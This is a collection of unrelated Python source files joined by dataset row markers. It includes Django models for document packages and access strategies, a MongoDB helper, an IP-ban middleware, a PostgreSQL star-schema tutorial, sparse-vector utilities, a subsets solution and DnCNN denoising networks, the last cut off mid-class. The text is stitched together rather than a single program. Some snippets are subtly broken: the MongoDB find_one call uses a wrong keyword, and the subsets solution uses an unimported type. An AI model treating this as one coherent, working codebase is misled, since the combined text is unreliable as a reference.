    object_id = models.PositiveIntegerField()
    content_object = GenericForeignKey('content_type', 'object_id')
    file_type = models.ForeignKey('DocumentTypeModel',
                                  on_delete=models.CASCADE)

    def delete(self, using=None, keep_parents=False):
        # Remove the on-disk file (if present) before deleting the row.
        if os.path.exists(str_add_app(self.file_path)):
            os.remove(str_add_app(self.file_path))
        return super().delete(using=using, keep_parents=keep_parents)

    class Meta:
        abstract = True
class SingleFile(AbstractFileModel):
    """A one-off document: exactly one file of its type per package."""

    def __str__(self):
        return str(self.file_type)

    class Meta:
        verbose_name_plural = "Единичные файлы"
class PackFile(AbstractFileModel):
    """A file belonging to a repeated set, keyed by a unique document number."""

    unique_number = models.ForeignKey('SyncUniqueNumber',
                                      on_delete=models.CASCADE,
                                      null=True, blank=True)

    class Meta:
        abstract = False
        verbose_name_plural = "Фаилы набора"

    def initialize_folder(self, path: str):
        """Create the per-doc-type sub-folder under *path*.

        Raises AttributeError when file_type is not set (the folder name is
        derived from the pluralized document type).
        """
        if self.file_type:
            tmp_str_path = plur_form(self.file_type.doc_type)
            if not os.path.isdir(f'{path}/{tmp_str_path}/'):
                os.makedirs(f'{path}/{tmp_str_path}/')
        else:
            raise AttributeError()

    def get_files_path(self, package: 'DocumentsPackage'):
        """Return (and ensure) the folder for this file type inside *package*."""
        tmp_path = package.get_save_path()
        self.initialize_folder(tmp_path)
        return os.path.join(tmp_path, f'{plur_form(self.file_type.doc_type)}/')
def other_files_directory_path(instance, filename):
    """Upload path for OtherFile: <owning package's save path>/прочие/<filename>."""
    base = instance.content_object.get_save_path()
    return f'{base}/прочие/{filename}'
class OtherFile(AbstractFileModel):
    """An arbitrary user-uploaded file attached to a package, with comments."""

    file_obj = models.FileField('Произвольные файлы',
                                upload_to=other_files_directory_path,
                                max_length=500)
    commentary = GenericRelation(Commentary, related_query_name='file')

    class Meta:
        verbose_name_plural = "Прочие файлы"
class ActExam(models.Model):
    """Inspection act ('Акт осмотра'): one file stored under FOLDER."""

    # Sub-folder (relative to the package save path) holding the act file.
    FOLDER = 'Акт осмотра/'
    file_path = models.CharField('Путь', max_length=255, blank=True, null=True)
    file_name = models.CharField('Название файла', max_length=255,
                                 null=True, blank=True)

    @classmethod
    def initialize_folder(cls, path: str):
        """Create the act sub-folder under *path* if it is missing."""
        tmp_path = f'{path}/{cls.FOLDER}'
        if not os.path.isdir(tmp_path):
            os.makedirs(tmp_path)

    @classmethod
    def get_files_path(cls, package: 'DocumentsPackage'):
        """Return (and ensure) the directory where act files are stored."""
        tmp_path = package.get_save_path()
        ActExam.initialize_folder(tmp_path)
        return os.path.join(tmp_path, cls.FOLDER)

    def clear_file(self):
        """Delete the file from disk and blank out path/name, persisting."""
        if os.path.exists(str_add_app(self.file_path)):
            os.remove(str_add_app(self.file_path))
        self.file_path = None
        self.file_name = None
        self.save()

    def delete(self, using=None, keep_parents=False):
        # Remove the on-disk file before deleting the DB row.
        self.clear_file()
        return super().delete(using=using, keep_parents=keep_parents)
class DocumentsPackage(models.Model):
    """A package of documents for one contragent.

    contragent -- owning contragent.
    name_uuid -- unique package id (regenerated for every new package).
    is_active -- True while the package is in work; False once closed.
    is_automatic -- True when the package was generated automatically: then
        contracts cannot be uploaded manually and debt_plan is read-only.
        When False, both may be edited.
    creation_date -- when the package was created.
    debt_plan -- planned debt amount (editable only when is_automatic is
        False).
    debt_fact -- actual debt amount, filled on reversal or payment.
    tax_count -- state fee; editable in any case.
    package_users -- every user who has worked with the package.
    package_state -- current workflow state.
    package_state_date -- when the state last changed.
    single_files -- set of one-off documents.
    pack_files -- sets of repeated files.
    other_files -- arbitrary extra files.
    commentary -- comments.
    """
    contragent = models.ForeignKey(Contragent, on_delete=models.CASCADE,
                                   related_name='contragents',
                                   related_query_name='contragent',
                                   null=True, blank=True)
    name_uuid = models.CharField('Идентификатор пакета', max_length=255,
                                 default=uuid.uuid4, null=True, blank=True,
                                 editable=False)
    is_active = models.BooleanField('Активный пакет', default=True)
    is_automatic = models.BooleanField('Создан автоматически', default=True)
    creation_date = models.DateField('Дата создания пакета', auto_now_add=True)
    debt_plan = models.FloatField('Сумма задолжности (плановая)',
                                  default=0.00)
    debt_fact = models.FloatField('Сумма задолжности (фактическая)',
                                  default=0.00)
    tax_count = models.FloatField('Госпошлина', default=0.00)
    package_users = models.ManyToManyField(settings.AUTH_USER_MODEL,
                                           related_name='packages')
    package_state = models.ForeignKey('State', on_delete=models.CASCADE,
                                      null=True, blank=True)
    package_state_date = models.DateField('Дата последнего действия',
                                          null=True, blank=True)
    single_files = GenericRelation(SingleFile)
    pack_files = GenericRelation(PackFile)
    other_files = GenericRelation(OtherFile)
    commentary = GenericRelation(Commentary, related_query_name='package')
    act = models.ForeignKey(ActExam, on_delete=models.CASCADE,
                            null=True, blank=True)

    def __str__(self):
        return f'Пакет {self.name_uuid}'

    def get_save_path(self):
        """Folder for this package's files (under the contragent when set)."""
        if self.contragent:
            return os.path.join(self.contragent.get_str_as_path(),
                                str(self.name_uuid))
        else:
            return f'{self.name_uuid}'

    @classmethod
    def get_active_package(cls, contragent: Contragent):
        """Return the contragent's single active package, or None."""
        try:
            res = cls.objects.get(contragent__id=contragent.pk, is_active=True)
            return res
        except ObjectDoesNotExist:
            return None

    def initialize_sub_folders(self):
        """Create the package folder on disk (no-op if it already exists)."""
        os.makedirs(str(self.get_save_path()), exist_ok=True)

    def is_user_in_package(self, user, use_department=False):
        """True if *user* -- or, with use_department, anyone from their
        department -- is already attached to this package."""
        users = self.package_users.all()
        if use_department:
            depts = [tmp_user.department for tmp_user in users]
            return (user.department in depts) or (user in users)
        return user in users

    def set_inactive(self):
        """Close the package."""
        self.is_active = False
        self.save()

    def change_state_to(self, new_state, is_backward):
        """Move to *new_state*; on forward moves, kick off asynchronous
        document generation for the contragent."""
        self.package_state = new_state
        self.package_state_date = datetime.date.today()
        if not is_backward:
            async_task(calc_create_gen_async, self.contragent, self, False,
                       group=self.name_uuid)
        # TODO Journal log here!
        self.save()

    class Meta:
        verbose_name_plural = "Пакеты документов"
class DocumentStateEntity(models.Model):
    """Links a set of document types to a workflow state and a file template."""
    documents = models.ManyToManyField('DocumentTypeModel',
                                       related_name='document_type')
    states = models.ForeignKey('State', related_name='states',
                               on_delete=models.CASCADE,
                               blank=True, null=True)
    template = models.ForeignKey('DocumentFileTemplate',
                                 on_delete=models.CASCADE,
                                 blank=True, null=True)
class DocumentFileTemplate(models.Model):
    """File-template set for one contragent class."""
    contagent_type = models.IntegerField(choices=KLASS_TYPES, default=0)
    # True when the template describes a repeated set of files (not one-offs).
    is_package = models.BooleanField('Набор файлов', default=False)

    def __str__(self):
        return KLASS_TYPES[self.contagent_type][1]

    class Meta:
        verbose_name_plural = "Шаблоны файлов"
# class SingleFilesTemplate(models.Model):
# contagent_type = models.IntegerField(choices=KLASS_TYPES, default=0)
# def __str__(self):
# return KLASS_TYPES[self.contagent_type][1]
# class Meta:
# verbose_name_plural = "Шаблоны единичных файлов"
# class PackFilesTemplate(models.Model):
# contagent_type = models.IntegerField(choices=KLASS_TYPES, default=0)
# documents = models.ManyToManyField('DocumentTypeModel',
# related_name='document_type_pack')
# def __str__(self):
# return KLASS_TYPES[self.contagent_type][1]
# class Meta:
# verbose_name_plural = "Шаблоны наборов файлов"
class NormativeCategory(models.Model):
    """Normative category: the kind of object a normative applies to."""
    name = models.CharField('Вид объекта',
                            max_length=255)
    # Index into NORM_TYPE: the unit the statistic value is measured in.
    norm_type = models.IntegerField('Показатель расчета', default=0,
                                    choices=NORM_TYPE, blank=True, null=True)
    normative = models.ManyToManyField('Normative', related_name='normatives',
                                       verbose_name='Нормативы')

    def __str__(self):
        return self.name

    @property
    def print_norm_type(self):
        """Human-readable unit name."""
        return NORM_TYPE[self.norm_type][1]

    class Meta:
        verbose_name_plural = "Категории нормативов"
class Normative(models.Model):
    """A yearly normative value together with its validity period."""
    since_date = models.DateField('Дата начала действия норматива',
                                  null=True, blank=True)
    up_to_date = models.DateField('Дата окончания действия норматива',
                                  null=True, blank=True)
    value = models.FloatField('Значение норматива (год.)',
                              null=True, blank=True)

    def __str__(self):
        return (f'Норматив: {self.value}/год.,'
                + f' действующий с {self.since_date.strftime("%d.%m.%Y")}'
                + f' по {self.up_to_date.strftime("%d.%m.%Y")}')

    class Meta:
        verbose_name_plural = "Нормативы"
class Contract(models.Model):
    """Source of unique contract numbers.

    Stores its creation date so the generated string form
    (``NNNNNN-YYYY/ТКО/01``) carries the right year.
    """
    date_field = models.DateField(auto_now_add=True)

    def __str__(self):
        return f'{self.pk:06}-{(self.date_field).year}/ТКО/01'

    class Meta:
        verbose_name_plural = "Сгенерированые номера договоров"
class ContractNumberClass(models.Model):
    """Proxy linking a document to its contract number.

    Optional creation parameters (see :meth:`create`):
        new -- whether to generate a fresh number (True) or reuse an
            existing one;
        exist_number -- the pre-existing contract number (string).

    Fields:
        is_generated -- whether the number was generated here or taken
            from an external source;
        contract_obj -- the generated Contract row (None otherwise);
        contract_exist_number -- externally supplied number; empty string
            when the number was generated;
        contract_number -- string form of the number regardless of origin.
    """

    is_generated = models.BooleanField(default=False)
    contract_obj = models.OneToOneField(Contract,
                                        on_delete=models.CASCADE,
                                        null=True, blank=True)
    contract_exist_number = models.CharField(default='',
                                             max_length=255,
                                             null=True, blank=True)

    @classmethod
    def create(cls, new: bool = False, exist_number: str = ''):
        """Factory: build and save an instance, generating a Contract row
        when *new* is True."""
        contract_num_obj = cls(is_generated=new)
        if new:
            contract_num_obj.contract_obj = Contract.objects.create()
        else:
            contract_num_obj.contract_exist_number = exist_number
        contract_num_obj.save()
        return contract_num_obj

    @property
    def contract_number(self):
        # Unified accessor for generated and external numbers.
        if self.is_generated:
            return str(self.contract_obj)
        else:
            return self.contract_exist_number

    def __str__(self):
        return self.contract_number

    class Meta:
        verbose_name_plural = "Номера договоров"
class SyncUniqueNumber(models.Model):
    """Source of unique document numbers, rendered as ``NNNNNNNN/01``."""

    def __str__(self):
        return f'{self.pk:08}/01'

    class Meta:
        verbose_name_plural = "Номера документов"
class CityModel(models.Model):
    """A city; used to scope signatories and document templates."""
    name = models.CharField('Город', max_length=255, null=True, blank=True)

    def __str__(self):
        return self.name

    class Meta:
        verbose_name_plural = "Города"
class TemplateModel(models.Model):
    """Document template: path to a template file, scoped by city,
    contragent type and document type."""
    template_path = models.CharField('Путь до шаблона', max_length=255)
    city = models.ForeignKey(CityModel, on_delete=models.CASCADE)
    contragent_type = models.IntegerField('Тип контрагента',
                                          choices=KLASS_TYPES, default=0)
    document_type = models.ForeignKey('DocumentTypeModel',
                                      verbose_name='Тип документа',
                                      on_delete=models.CASCADE)

    def __str__(self):
        return f'{str(self.document_type)}|\
{KLASS_TYPES[self.contragent_type][1]}|{self.city}'

    class Meta:
        verbose_name_plural = "Шаблоны документов"
class DocumentTypeModel(models.Model):
    """A document type; is_pack marks types that come as repeated sets."""
    doc_type = models.CharField('Тип документа', max_length=255,
                                null=True, blank=True)
    is_pack = models.BooleanField('Пакет документов', default=False)

    def __str__(self):
        return self.doc_type

    class Meta:
        verbose_name_plural = "Типы документов"
#########
# State #
#########
class State(models.Model):
    """Workflow state of a documents package, with department permissions."""
    name_state = models.CharField('Состояние', max_length=255)
    departments = models.ManyToManyField('yellowbird.Department',
                                         verbose_name='Отделы',
                                         related_name='available_states')
    is_initial_state = models.BooleanField('Начальное состояние',
                                           default=False)
    is_final_state = models.BooleanField('Конечное состояние', default=False)

    def get_linked_events(self):
        """Events whose transition starts from this state."""
        return Event.objects.filter(from_state=self.id)

    def _is_dept_permitted(self, department):
        """True if *department* is allowed to act in this state."""
        return department in self.departments.all()

    def is_permitted(self, user):
        """True if *user* may act here: staff/superusers always may,
        otherwise their department must be permitted."""
        return (user.is_superuser or user.is_staff
                or self._is_dept_permitted(user.department))

    def __str__(self):
        return self.name_state

    class Meta:
        verbose_name_plural = 'Состояния'
class Event(models.Model):
    """Workflow transition between two states."""
    name_event = models.CharField('Событие', max_length=255)
    from_state = models.ForeignKey(State, on_delete=models.CASCADE,
                                   verbose_name='Исходное состояние',
                                   blank=True, null=True,
                                   related_name='begin_states')
    to_state = models.ForeignKey(State, on_delete=models.CASCADE,
                                 verbose_name='Конечное состояние',
                                 blank=True, null=True,
                                 related_name='end_states')
    # True for transitions that move the package backwards in the workflow.
    is_move_backward = models.BooleanField('Двигаемся обратно назад',
                                           default=False)

    def __str__(self):
        return self.name_event

    class Meta:
        verbose_name_plural = 'События'
##############
# Strategies #
##############
class ListStrategy(ABC):
    """Strategy interface: which contragents a given user may see."""

    @abstractmethod
    def execute_list_strategy(self, user):
        """Return the contragents visible to *user*."""
        raise NotImplementedError

    @abstractmethod
    def execute_single_strategy(self, pk, user):
        """Return contragent *pk* if visible to *user*, else None."""
        raise NotImplementedError
class OnlyEmptyRecords(ListStrategy):
    """Show only contragents that have no active documents package."""

    def execute_list_strategy(self, user):
        return [c for c in Contragent.objects.all() if not c.active_package]

    def execute_single_strategy(self, pk, user):
        try:
            contragent = Contragent.objects.get(pk=pk)
        except Contragent.DoesNotExist:
            return None
        return None if contragent.active_package else contragent
class OnlyMyRecordsStrategy(ListStrategy):
    """Show only contragents whose active package currently involves *user*.

    FIX: the previous version filtered with ``current_user__contain=user``.
    ``current_user`` is a Python property on Contragent, not a model field,
    and ``__contain`` is not a valid lookup, so the query raised FieldError
    at runtime. Filter in Python instead, like the sibling strategies do.
    """

    def execute_list_strategy(self, user):
        return [c for c in Contragent.objects.all()
                if c.current_user and user in c.current_user]

    def execute_single_strategy(self, pk, user):
        try:
            contragent = Contragent.objects.get(pk=pk)
        except Contragent.DoesNotExist:
            return None
        if contragent.current_user and user in contragent.current_user:
            return contragent
        return None
class AllRecords(ListStrategy):
    """No filtering: every contragent is visible."""

    def execute_list_strategy(self, user):
        return Contragent.objects.all()

    def execute_single_strategy(self, pk, user):
        try:
            return Contragent.objects.get(pk=pk)
        except Contragent.DoesNotExist:
            return None
class AllInDepartmentRecords(ListStrategy):
    """Show contragents whose active package's state permits the user
    (records without a package or state are always visible)."""

    def execute_list_strategy(self, user):
        res = list()
        for c in Contragent.objects.all():
            tmp_pack = c.get_active_package()
            state = tmp_pack.package_state if tmp_pack else None
            # FIX: State.is_permitted expects a *user* (it reads
            # user.is_superuser / user.is_staff / user.department); the old
            # code passed user.department, which lacks those attributes.
            if state is None or state.is_permitted(user):
                res.append(c)
        return res

    def execute_single_strategy(self, pk, user):
        try:
            contragent = Contragent.objects.get(pk=pk)
        except Contragent.DoesNotExist:
            return None
        tmp_pack = contragent.get_active_package()
        if tmp_pack:
            # Visible only when someone from the user's department is a
            # current user of the package.
            tmp_list = [c.department == user.department
                        for c in contragent.current_user]
            if any(tmp_list):
                return contragent
            return None
        return contragent
class MyAndEmptyRecordsStrategy(ListStrategy):
    """Show the user's own records plus records with no package or state."""

    def execute_list_strategy(self, user):
        res = list()
        for c in Contragent.objects.all():
            tmp_pack = c.get_active_package()
            if not tmp_pack:
                # Empty record: no active package yet.
                res.append(c)
                continue
            tmp_state = tmp_pack.package_state
            if not tmp_state:
                # Package without a workflow state: treated as unclaimed.
                res.append(c)
            elif tmp_state.is_permitted(user) and (user in c.current_user):
                # The user's own record.
                res.append(c)
        return res

    def execute_single_strategy(self, pk, user):
        try:
            contragent = Contragent.objects.get(pk=pk)
        except Contragent.DoesNotExist:
            return None
        tmp_pack = contragent.get_active_package()
        if tmp_pack:
            tmp_state = tmp_pack.package_state
            if tmp_state:
                if tmp_state.is_permitted(user) and (
                        user in contragent.current_user):
                    return contragent
                # FIX: previously this case fell through and returned the
                # contragent even when the user was not permitted; mirror
                # AllInDepartmentRecords and hide it instead.
                return None
        return contragent
# Human-readable strategy names, in the same order as STRATEGIES_FUNCTIONS.
STRATEGIES_LIST = ['Мои записи и пустые', 'Все по отделу', 'Все',
                   'Только мои записи', 'Только пустые записи']
STRATEGIES_TUPLES = list(enumerate(STRATEGIES_LIST))
STRATEGIES_FUNCTIONS = [MyAndEmptyRecordsStrategy, AllInDepartmentRecords,
                        AllRecords, OnlyMyRecordsStrategy, OnlyEmptyRecords]
# Strategy name -> strategy class.
STRATEGIES = dict(zip(STRATEGIES_LIST, STRATEGIES_FUNCTIONS))

# Archive-download menu actions (action id -> label).
ZIP_FILES_ACTIONS = {
    0: "Скачать весь пакет",
    1: "Скачать основные файлы",
    2: "Скачать акты",
    3: "Скачать счета",
    4: "Скачать счета фактуры",
    5: "Скачать прочие файлы",
}
|
7,618 | e79505e802a06f091bbb12708c45e04c4e80da60 | import FWCore.ParameterSet.Config as cms
from RecoTracker.MeasurementDet.UpdaterService_cfi import *
from RecoTracker.MeasurementDet.MeasurementTrackerESProducer_cfi import *
|
7,619 | b5f88a6d119f2c3ce8fb77cf8c45b6c9252f5128 | from pymongo import MongoClient
class MongoDB():
def __init__(self, host, port, db, table):
self.host = host
self.port = port
self.client = MongoClient(host=self.host, port=self.port)
self.db = self.client[db]
self.table = self.db[table]
# 获取一条数据
def get_one(self, query):
return self.table.find_one(query, property={"_id":False})
# 获取多条数据
def get_all(self, query):
return self.table.find(query)
# 添加数据
def add(self, kv_dict):
return self.table.insert_one(kv_dict)
# 删除数据
def delete(self, query):
return self.table.delete_many(query)
# 查看集合中是否包含满足的数据 如果有返回True
def check(self, query):
return self.table.find_one(query)
|
7,620 | 9289eb32db145187c5b4140e32acff520be8366e | from models import Ban
from django.shortcuts import render_to_response
class IPBanMiddleware(object):
    """
    Simple middleware for taking care of bans from specific IP's
    Redirects the banned user to a ban-page with an explanation
    """
    def process_request(self, request):
        # NOTE(review): this is the old-style (pre-Django-1.10) middleware
        # hook.  It reads REMOTE_ADDR directly, so behind a reverse proxy
        # every client appears as the proxy's IP -- verify deployment.
        ip = request.META['REMOTE_ADDR'] # user's IP
        # see if user is banned
        try:
            # if this doesnt throw an exception, user is banned
            ban = Ban.objects.get(ip=ip)
            if ban.banned():
                # return the "ban page" instead of the requested view
                return render_to_response("ban/banned.html",
                    {"reason": ban.reason, "unbandate": ban.unbandate()})
            else:
                # User was previously banned, but the ban is over by now;
                # remove the stale Ban row so future requests skip the lookup.
                ban.delete()
                pass
        except Ban.DoesNotExist: # not banned! goodie
            pass
|
7,621 | 70964ac617847dd4bf4a60a142afc94d0f284a24 | #!/usr/bin/env python
# coding: utf-8
# # Lesson 2 Demo 3: Creating Fact and Dimension Tables with Star Schema
#
# <img src="images/postgresSQLlogo.png" width="250" height="250">
# ### Walk through the basics of modeling data using Fact and Dimension tables. In this demo, we will:<br>
# <ol><li>Create both Fact and Dimension tables<li>Show how this is a basic element of the Star Schema.
# ### Import the library
# Note: An error might popup after this command has executed. If it does, read it carefully before ignoring.
# In[ ]:
import psycopg2
# ### Create a connection to the database
# In[ ]:
# Demo: build a star schema (fact table customer_transactions + dimension
# tables items_purchased, store, customer), run two example queries, then
# drop everything.  Refactored from 20 copy-pasted try/except blocks into
# two helpers; behavior (statements executed, messages printed) unchanged.
def _run_sql(cur, sql, params=None, errmsg="Error: executing statement"):
    """Execute one statement; print (rather than raise) any psycopg2 error."""
    try:
        cur.execute(sql, params)
    except psycopg2.Error as e:
        print(errmsg)
        print(e)


def _print_rows(cur):
    """Print every row produced by the cursor's last query."""
    row = cur.fetchone()
    while row:
        print(row)
        row = cur.fetchone()


# --- connect; autocommit so each statement commits immediately ---
try:
    conn = psycopg2.connect("host=127.0.0.1 dbname=studentdb user=student password=student")
except psycopg2.Error as e:
    print("Error: Could not make connection to the Postgres database")
    print(e)
try:
    cur = conn.cursor()
except psycopg2.Error as e:
    # (typo "curser" fixed in this message)
    print("Error: Could not get cursor to the Database")
    print(e)
conn.set_session(autocommit=True)

# --- fact table (center of the star) ---
_run_sql(cur,
         "CREATE TABLE IF NOT EXISTS customer_transactions (customer_id int, store_id int, spent numeric);",
         errmsg="Error: Issue creating table")
_run_sql(cur,
         "INSERT INTO customer_transactions (customer_id, store_id, spent) VALUES (%s, %s, %s)",
         (1, 1, 20.50), "Error: Inserting Rows")
_run_sql(cur,
         "INSERT INTO customer_transactions (customer_id, store_id, spent) VALUES (%s, %s, %s)",
         (2, 1, 35.21), "Error: Inserting Rows")

# --- dimension tables ---
_run_sql(cur,
         "CREATE TABLE IF NOT EXISTS items_purchased (customer_id int, item_number int, item_name varchar);",
         errmsg="Error: Issue creating table")
_run_sql(cur,
         "INSERT INTO items_purchased (customer_id, item_number, item_name) VALUES (%s, %s, %s)",
         (1, 1, "Rubber Soul"), "Error: Inserting Rows")
_run_sql(cur,
         "INSERT INTO items_purchased (customer_id, item_number, item_name) VALUES (%s, %s, %s)",
         (2, 3, "Let It Be"), "Error: Inserting Rows")
_run_sql(cur, "CREATE TABLE IF NOT EXISTS store (store_id int, state varchar);",
         errmsg="Error: Issue creating table")
_run_sql(cur, "INSERT INTO store (store_id, state) VALUES (%s, %s)",
         (1, "CA"), "Error: Inserting Rows")
_run_sql(cur, "INSERT INTO store (store_id, state) VALUES (%s, %s)",
         (2, "WA"), "Error: Inserting Rows")
_run_sql(cur,
         "CREATE TABLE IF NOT EXISTS customer (customer_id int, name varchar, rewards boolean);",
         errmsg="Error: Issue creating table")
_run_sql(cur, "INSERT INTO customer (customer_id, name, rewards) VALUES (%s, %s, %s)",
         (1, "Amanda", True), "Error: Inserting Rows")
_run_sql(cur, "INSERT INTO customer (customer_id, name, rewards) VALUES (%s, %s, %s)",
         (2, "Toby", False), "Error: Inserting Rows")

# Query 1: customers who spent more than 30 dollars -- who they are, what
# they bought, and whether they are rewards members.
_run_sql(cur,
         "SELECT name, item_name, rewards FROM ((customer_transactions JOIN customer ON customer.customer_id=customer_transactions.customer_id) JOIN items_purchased ON customer_transactions.customer_id=items_purchased.customer_id) WHERE spent > 30 ;",
         errmsg="Error: select *")
_print_rows(cur)

# Query 2: total sales per store.
_run_sql(cur, "SELECT store_id, SUM(spent) FROM customer_transactions GROUP BY store_id;",
         errmsg="Error: select *")
_print_rows(cur)

# --- clean up the demo tables and close the connection ---
for _tbl in ("customer_transactions", "items_purchased", "customer", "store"):
    _run_sql(cur, "DROP table " + _tbl, errmsg="Error: Dropping table")
cur.close()
conn.close()
|
7,622 | 4cefaa964251e77a05066af1f61f9fd2a4350d38 | #!/usr/bin/env python
# Read all of stdin and print every http/https URL found, one per line.
import sys,re
# The character class includes the literal range $-_ plus common URL
# punctuation and percent-encoded byte sequences.
print('\n'.join(re.findall(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+',sys.stdin.read())))
|
7,623 | fa566eb77b17830acad8c7bfc2b958760d982925 | from django.db import models
# from rest_framework import permissions
from drawAppBackend import settings
# from django.contrib.auth.models import AbstractUser
# Create your models here.
class DrawApp(models.Model):
    """A drawing task with a title, free-text description and completed flag."""
    title = models.CharField(max_length=120)
    description = models.TextField()
    completed = models.BooleanField(default=False)

    def __str__(self):
        # BUG FIX: was misspelled ``_str_`` (single underscores), so Django
        # never called it and instances printed as the default object repr.
        return self.title
class SavedDrawings(models.Model):
    """A saved drawing belonging to a user."""
    # Deleting the user cascades to their drawings; null=True additionally
    # permits ownerless rows.
    username = models.ForeignKey(
        settings.AUTH_USER_MODEL, on_delete=models.CASCADE, null=True)
    # Client-side save slot/identifier.
    saveId = models.IntegerField()
    # Display name of the save.
    saveName = models.CharField(max_length=500)
    # Presumably serialized corner coordinates of the drawing -- confirm
    # the exact format against the frontend payload.
    corners = models.TextField()
# class CustomUser(AbstractUser):
# # Any extra fields would go here
# def __str__(self):
# return self.email
|
7,624 | f0e4cd13571728d61566c4093586c91323629e0b | # coding: utf-8
import numpy as np
def sparse(n, k):
    """Return a length-``n`` vector with exactly ``k`` nonzero entries.

    The support (nonzero positions) is chosen uniformly at random without
    replacement; the nonzero values are drawn from the standard normal
    distribution N(0, 1).

    Args:
        n: size of the vector.
        k: number of nonzero entries (0 <= k <= n).

    Returns:
        numpy.ndarray of shape (n,).
    """
    z = np.zeros(n)
    # ``replace=False`` -- the original passed ``replace=None``, which only
    # behaved correctly because None happens to be falsy.  Vectorized
    # assignment replaces the per-index Python loop.
    support = np.random.choice(n, k, replace=False)
    z[support] = np.random.randn(k)
    return z
def compressible(n, k, e=0.1):
    """Return a k-compressible vector of length *n*.

    A k-sparse vector (see :func:`sparse`) perturbed by additive Gaussian
    noise of scale *e*: k dominant entries, n-k small but nonzero ones.

    Args:
        n: size of the vector.
        k: number of dominant entries.
        e: noise scale factor.

    Returns:
        numpy.ndarray of shape (n,).
    """
    backbone = sparse(n, k)
    perturbation = e * np.random.randn(n)
    return backbone + perturbation
if __name__ == '__main__':
    # Smoke demo: print one sparse and one compressible example vector.
    # BUG FIX: the original used Python 2 print statements, a SyntaxError
    # on any Python 3 interpreter.
    s = 2
    print("%s-sparse vector:" % s)
    print(sparse(10, s))
    print(compressible(10, s, 0.1))
|
7,625 | 7d873ed216355d1688ec79ff337304d8ebfd2754 | class Solution:
def subsets(self, nums: List[int]) -> List[List[int]]:
'''
ans = set()
n = len(nums)
for x, val in enumerate(nums):
for y in range(x + 1, n + 1):
ans.add(frozenset(nums[x:y]))
for u in range(0, x + 1):
for z in range(y + 1, n + 1):
ans.add(frozenset([nums[u]] + nums[y:z + 1]))
ans.add(frozenset(nums[0:u + 1] + nums[y:z + 1]))
ans.add(frozenset([nums[u]] + nums[z:n + 1]))
ans.add(frozenset(nums[0:u + 1] + nums[z:n + 1]))
ans.add(frozenset([]))
return ans
'''
all_subsets = [[]]
if nums:
for num in nums:
for idx in range(len(all_subsets)):
all_subsets.append(all_subsets[idx] + [num])
return all_subsets
|
7,626 | 9c60d82d42716abb036dc7297a2dca66f0508984 | import os
import numpy as np
import torch
from torch import nn
from torch.nn import functional as F
import torch.utils.data as td
import torchvision as tv
import pandas as pd
from PIL import Image
from matplotlib import pyplot as plt
from utils import imshow, NNRegressor
class DnCNN(NNRegressor):
    """DnCNN denoiser: D conv+BN+ReLU blocks with a residual skip connection."""

    def __init__(self, D, C=64):
        """D: number of intermediate conv layers; C: channel width."""
        super(DnCNN, self).__init__()
        self.D = D
        # convolution layers: 3 -> C, D x (C -> C), C -> 3, all 3x3 "same"
        self.conv = nn.ModuleList()
        self.conv.append(nn.Conv2d(3, C, 3, padding=1))
        self.conv.extend([nn.Conv2d(C, C, 3, padding=1) for _ in range(D)])
        self.conv.append(nn.Conv2d(C, 3, 3, padding=1))
        # apply He's initialization to every conv layer except the last
        for i in range(len(self.conv[:-1])):
            nn.init.kaiming_normal_(
                self.conv[i].weight.data, nonlinearity='relu')
        # batch normalization
        # BUG FIX: ``nn.BatchNorm2d(C, C)`` passed C as the *eps* argument
        # (eps=64 instead of the default 1e-5), crippling normalization.
        self.bn = nn.ModuleList()
        self.bn.extend([nn.BatchNorm2d(C) for _ in range(D)])
        # initialize the weights of the Batch normalization layers
        for i in range(D):
            nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C))

    def forward(self, x):
        """Residual forward pass: y = conv_last(blocks(x)) + x."""
        D = self.D
        h = F.relu(self.conv[0](x))
        for i in range(D):
            h = F.relu(self.bn[i](self.conv[i+1](h)))
        y = self.conv[D+1](h) + x
        return y
class UDnCNN(NNRegressor):
    """U-shaped DnCNN: conv/BN/ReLU blocks with max-pool downsampling,
    max-unpool upsampling, skip connections, and a residual output."""

    def __init__(self, D, C=64):
        """D: number of intermediate conv layers; C: channel width."""
        super(UDnCNN, self).__init__()
        self.D = D
        # convolution layers: 3 -> C, D x (C -> C), C -> 3, all 3x3 "same"
        self.conv = nn.ModuleList()
        self.conv.append(nn.Conv2d(3, C, 3, padding=1))
        self.conv.extend([nn.Conv2d(C, C, 3, padding=1) for _ in range(D)])
        self.conv.append(nn.Conv2d(C, 3, 3, padding=1))
        # apply He's initialization to every conv layer except the last
        for i in range(len(self.conv[:-1])):
            nn.init.kaiming_normal_(
                self.conv[i].weight.data, nonlinearity='relu')
        # batch normalization
        # BUG FIX: ``nn.BatchNorm2d(C, C)`` passed C as the *eps* argument
        # (eps=64 instead of the default 1e-5), crippling normalization.
        self.bn = nn.ModuleList()
        self.bn.extend([nn.BatchNorm2d(C) for _ in range(D)])
        # initialize the weights of the Batch normalization layers
        for i in range(D):
            nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C))

    def forward(self, x):
        """Encoder (pool) -> bottleneck -> decoder (unpool + skips), residual."""
        D = self.D
        h = F.relu(self.conv[0](x))
        h_buff = []      # encoder activations for skip connections
        idx_buff = []    # max-pool indices required by max_unpool2d
        shape_buff = []  # pre-pool shapes so unpooling restores exact sizes
        for i in range(D//2-1):
            shape_buff.append(h.shape)
            h, idx = F.max_pool2d(F.relu(self.bn[i](self.conv[i+1](h))),
                                  kernel_size=(2, 2), return_indices=True)
            h_buff.append(h)
            idx_buff.append(idx)
        for i in range(D//2-1, D//2+1):
            h = F.relu(self.bn[i](self.conv[i+1](h)))
        for i in range(D//2+1, D):
            j = i - (D // 2 + 1) + 1
            # /sqrt(2) keeps the variance of the summed skip connection stable
            h = F.max_unpool2d(F.relu(self.bn[i](self.conv[i+1]((h+h_buff[-j])/np.sqrt(2)))),
                               idx_buff[-j], kernel_size=(2, 2), output_size=shape_buff[-j])
        y = self.conv[D+1](h) + x
        return y
class DUDnCNN(NNRegressor):
    """Dilated U-DnCNN: replaces pooling/unpooling with dilated convolutions
    whose dilation schedule mimics the U-Net's effective receptive field."""

    def __init__(self, D, C=64):
        """D: number of intermediate conv layers; C: channel width."""
        super(DUDnCNN, self).__init__()
        self.D = D
        # compute k (virtual max_pool count) and l (virtual max_unpool count)
        k = [0]
        k.extend([i for i in range(D//2)])
        k.extend([k[-1] for _ in range(D//2, D+1)])
